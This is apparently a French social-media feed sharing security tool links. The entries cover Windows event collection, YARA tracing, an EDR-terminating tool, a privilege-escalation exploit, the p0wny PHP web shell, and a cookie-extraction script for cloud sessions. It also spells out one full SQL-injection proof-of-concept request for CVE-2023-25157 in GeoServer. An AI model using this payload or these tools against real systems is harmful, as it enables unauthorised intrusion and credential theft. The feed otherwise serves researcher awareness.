Plus récents

OpenWEC

A free & open source (GPLv3) implementation of a Windows Event Collector server running on GNU/Linux & written in Rust.

github.com/cea-sec/openwec

Blink v1.0

Blink is a brand new unprivileged userspace virtual machine that can emulate x86-64-linux binaries on any POSIX platform.

github.com/jart/blink/releases

몾 Artemis a partagé

🛠 yara-ttd

Use YARA rules on Time Traveil Debugging traces. The idea behind yara-ttd is to use the trace files recorded by TTD with yara itself to defeat packers

github.com/airbus-cert/yara-tt

PE with spoofed sections

An undocumented trick to embed executable code within (what appears to be) a read-only PE section. The proof-of-concepts described above involve appending the payload to the end of the NT headers, but it is also possible to embed executable code within the headers.

Nice, x86matthew. Ping @siri_urz

secret.club/2023/06/05/spoof-p

  • sample : https://secret.club/assets/pe_section_spoof/pe_section_spoof.zip

🛠 nbutools

Tools for offensive security of NetBackup infrastructures

github.com/airbus-seclab/nbuto

Terminator

Reproducing Spyboy technique to terminate all EDR/XDR/AVs processes

github.com/ZeroMemoryEx/Termin

DavRelayUp

An universal no-fix local privilege escalation in domain-joined Windows workstations where LDAP signing is not enforced

github.com/Dec0ne/DavRelayUp

PoC CVE-2023-25157 by @parzel

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=osm:osm_places&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+current_user%29+AS+INTEGER%29%29+--+%27%29+%3D+true

ObjectWalker v2.1.6 by Rémi Gascou

module to explore the object tree to extract paths to interesting targets / objects in memory

github.com/p0dalirius/objectwa

몾 Artemis a partagé

✨️ New p0wny@shell release!

➡️ github.com/flozz/p0wny-shell

It now tries different execution functions (exec, shell_exec, system, passthru, popen, proc_open) to run commands to bypass disabled functions! 😎️

  • Process_String_Extractor.ps1

This scriplet is also able to extract Cookies for Microsoft O365 / Microsoft Azure PTC Attack

gist.github.com/LuemmelSec/3f2

Plus anciens
nanao

Comme le soleil, les machines ne se couchent jamais.